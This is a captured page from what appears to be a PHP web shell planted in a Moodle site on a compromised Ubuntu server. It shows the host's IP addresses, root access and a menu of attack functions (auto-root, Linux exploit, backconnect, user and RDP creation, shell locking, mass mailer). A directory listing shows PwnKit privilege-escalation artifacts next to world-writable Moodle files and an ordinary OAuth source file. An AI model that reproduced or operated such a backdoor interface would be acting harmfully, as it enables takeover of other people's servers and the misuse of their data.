Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
enrol /
lti /
ims-blti /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE.txt
1.05
KB
-rwxrwxrwx
OAuth.php
22.93
KB
-rwxrwxrwx
OAuthBody.php
4.55
KB
-rwxrwxrwx
TrivialOAuthDataStore.php
1.37
KB
-rwxrwxrwx
blti.php
10.47
KB
-rwxrwxrwx
blti_util.php
8.11
KB
-rwxrwxrwx
moodle_readme.txt
410
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TrivialOAuthDataStore.php
<?php require_once($CFG->dirroot . '/enrol/lti/ims-blti/OAuth.php'); /** * A Trivial memory-based store - no support for tokens */ class TrivialOAuthDataStore extends OAuthDataStore { private $consumers = array(); function add_consumer($consumer_key, $consumer_secret) { $this->consumers[$consumer_key] = $consumer_secret; } function lookup_consumer($consumer_key) { if ( strpos($consumer_key, "http://" ) === 0 ) { $consumer = new OAuthConsumer($consumer_key,"secret", NULL); return $consumer; } if ( $this->consumers[$consumer_key] ) { $consumer = new OAuthConsumer($consumer_key,$this->consumers[$consumer_key], NULL); return $consumer; } return NULL; } function lookup_token($consumer, $token_type, $token) { return new OAuthToken($consumer, ""); } // Return NULL if the nonce has not been used // Return $nonce if the nonce was previously used function lookup_nonce($consumer, $token, $nonce, $timestamp) { // Should add some clever logic to keep nonces from // being reused - for no we are really trusting // that the timestamp will save us return NULL; } function new_request_token($consumer) { return NULL; } function new_access_token($token, $consumer) { return NULL; } } ?>
Close